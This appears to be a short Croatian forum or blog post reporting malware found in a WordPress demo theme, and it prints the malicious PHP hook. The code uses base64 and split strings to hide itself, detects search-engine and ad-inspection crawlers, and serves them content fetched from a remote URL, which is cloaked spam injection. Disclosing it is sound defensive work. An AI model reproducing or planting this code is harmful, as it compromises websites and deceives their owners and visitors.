Malware u Biomovoj demo temi

Vjerojatno se naselio kroz online editor.

add_action('template_redirect', 'Xyz_abc123');

function Xyz_abc123() {
  if (strpos($_SERVER['REQUEST_URI'], '/en/') === 0) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

    $curlFn = function($u) {
      $c = curl_init();
      curl_setopt($c, CURLOPT_URL, $u);
      curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
      curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
      $r = curl_exec($c);
      curl_close($c);
      return $r;
    };

    $e_log = base64_decode('aHR0cHM6Ly9wYXN0aXBlandhbi5wYWdlcy5kZXYvZzJrL2Jpb20uaHIuaHRt');

    $esc_ele = implode('', [
      chr(47), '(g', 'oo', 'glebot|', 'slu', 'rp|ad', 'se',
      'nse|insp', 'ect', 'ion)', chr(47)
    ]);

    if (preg_match($esc_ele, $ua)) {
      echo $curlFn($e_log);
      exit;
    }
  }
}